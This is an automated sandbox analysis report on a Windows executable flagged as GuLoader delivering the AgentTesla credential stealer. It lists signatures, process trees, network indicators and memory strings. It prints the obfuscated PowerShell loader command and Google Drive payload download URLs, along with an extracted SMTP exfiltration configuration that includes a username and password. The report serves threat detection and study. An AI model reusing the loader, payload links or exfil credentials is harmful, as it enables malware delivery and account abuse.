Edit tour

Windows Analysis Report
Nt8BLNLKN7.exe

Overview

General Information

Sample name:	Nt8BLNLKN7.exe renamed because original name is a hash value
Original sample name:	286967221848728712fb3c332d30a149368b12e5581e61b84ed6dd55eb415b1b.exe
Analysis ID:	1549397
MD5:	e31f6ab5e499e9708eaa3c6ef6ac690e
SHA1:	953dcb9d4f23ca1d22a8ceb7690e23db6d837051
SHA256:	286967221848728712fb3c332d30a149368b12e5581e61b84ed6dd55eb415b1b
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Early bird code injection technique detected

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Check if machine is in data center or colocation facility

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Nt8BLNLKN7.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\Nt8BLNLKN7.exe" MD5: E31F6AB5E499E9708EAA3C6EF6AC690E)

powershell.exe (PID: 6216 cmdline: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7596 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": "   cJPF@$I3   "}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Armmuskler.Fac	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Temp\nsr982A.tmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2482982085.00000000237D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.1536832874.0000000008DA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.1228589004.0000000002719000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
0000000B.00000002.2482982085.00000000237A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2482982085.00000000237A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.1529740848.00000000062EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000002.00000002.1536993111.000000000B405000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7596	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 4 entries

Sigma Signatures

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.186.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7596, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49867

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7596, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49923

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ", CommandLine: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nt8BLNLKN7.exe", ParentImage: C:\Users\user\Desktop\Nt8BLNLKN7.exe, ParentProcessId: 6992, ParentProcessName: Nt8BLNLKN7.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ", ProcessId: 6216, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T15:56:21.520828+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.7	49715	TCP
2024-11-05T15:57:00.229752+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.7	49934	TCP

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T15:55:57.771584+0100	2030171	1	A Network Trojan was detected	192.168.2.7	49923	208.91.199.223	587	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T15:56:49.209942+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49867	142.250.186.78	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Nt8BLNLKN7.exe

Avira: detected

Found malware configuration

Source: powershell.exe.6216.2.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Source: Nt8BLNLKN7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.7:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49903 version: TLS 1.2

Source: Nt8BLNLKN7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1535081452.00000000088E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1531265885.00000000077C1000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_00405FF5 FindFirstFileA,FindClose,	0_2_00405FF5
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055B1

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49923 -> 208.91.199.223:587

Source: global traffic

TCP traffic: 192.168.2.7:49923 -> 208.91.199.223:587

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 208.91.199.223 208.91.199.223

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49715
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49867 -> 142.250.186.78:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49934

Source: global traffic

TCP traffic: 192.168.2.7:49923 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: smtp.santonswitchgears.com

Source: powershell.exe, 00000002.00000002.1531265885.00000000077C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.1531265885.00000000077C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: msiexec.exe, 0000000B.00000002.2482982085.0000000023791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: msiexec.exe, 0000000B.00000002.2482982085.0000000023791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Nt8BLNLKN7.exe, Nt8BLNLKN7.exe, 00000000.00000000.1221286992.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Nt8BLNLKN7.exe, 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Nt8BLNLKN7.exe, 00000000.00000000.1221286992.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Nt8BLNLKN7.exe, 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1526945005.0000000005295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1526945005.0000000005141000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2482982085.0000000023741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.santonswitchgears.com
Source: msiexec.exe, 0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: powershell.exe, 00000002.00000002.1526945005.0000000005295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1526945005.0000000005141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 0000000B.00000002.2482982085.0000000023741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: msiexec.exe, 0000000B.00000002.2482982085.0000000023741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: msiexec.exe, 0000000B.00000002.2482982085.0000000023741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 0000000B.00000002.2471290960.0000000007C9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 0000000B.00000002.2482415789.0000000022DC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2471290960.0000000007C9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso
Source: msiexec.exe, 0000000B.00000002.2471290960.0000000007C9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3csoUcE
Source: msiexec.exe, 0000000B.00000003.1740650950.0000000007D15000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2471290960.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1740569710.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Y
Source: msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2471290960.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2471290960.0000000007CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DCNS7VE8vVN-swgSahJP0MaXjRsS3cso&export=download
Source: msiexec.exe, 0000000B.00000003.1740650950.0000000007D15000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2471290960.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1740569710.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/e
Source: powershell.exe, 00000002.00000002.1526945005.0000000005295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.7:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49903 version: TLS 1.2

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040511A

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Code function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_00403217

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_00404959	0_2_00404959
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_004062CB	0_2_004062CB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EBE758	11_2_02EBE758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EB4AC0	11_2_02EB4AC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EBD770	11_2_02EBD770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EB41F0	11_2_02EB41F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EB3EA8	11_2_02EB3EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_266359D8	11_2_266359D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_26638EF0	11_2_26638EF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_26633300	11_2_26633300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_266387D8	11_2_266387D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2663AC98	11_2_2663AC98

Source: Nt8BLNLKN7.exe

Static PE information: invalid certificate

Source: Nt8BLNLKN7.exe, 00000000.00000000.1221303453.0000000000447000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamedracma afsoner.exeN vs Nt8BLNLKN7.exe

Source: Nt8BLNLKN7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/11@5/5

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Code function: 0_2_0040442A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040442A

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

File created: C:\Users\user\AppData\Roaming\supersystem

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsr9829.tmp

Jump to behavior

Source: Nt8BLNLKN7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

File read: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Nt8BLNLKN7.exe "C:\Users\user\Desktop\Nt8BLNLKN7.exe"
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: version.dll	Jump to behavior
